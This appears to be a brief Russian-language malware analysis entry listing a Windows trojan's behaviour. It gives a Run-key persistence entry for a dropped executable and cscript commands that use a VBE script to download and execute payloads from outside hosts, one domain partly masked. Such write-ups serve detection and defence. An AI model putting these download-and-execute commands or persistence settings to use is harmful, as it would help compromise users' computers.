Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'USBFM0N' = '%APPDATA%\amclpkylj3s1.exe'
- '<SYSTEM32>\cscript.exe' %APPDATA%\\win64s.vbe https://so7.egnyte.com/dd/QM98uMDqRC %APPDATA%\amclpkylj3s1.exe Exec
- '<SYSTEM32>\cscript.exe' %APPDATA%\\win64s.vbe http://vb#.###xadorfree.com/casa1/killa.z %APPDATA%\ProtectionManagement_Uninstall.exename Down
- '<SYSTEM32>\cscript.exe' %APPDATA%\\win64s.vbe http://vb#.###xadorfree.com/casa1/keyla.z %APPDATA%\ConfigSecurityPolicy.exename Down
- %APPDATA%\win64s.vbe
- %APPDATA%\win64s.vbe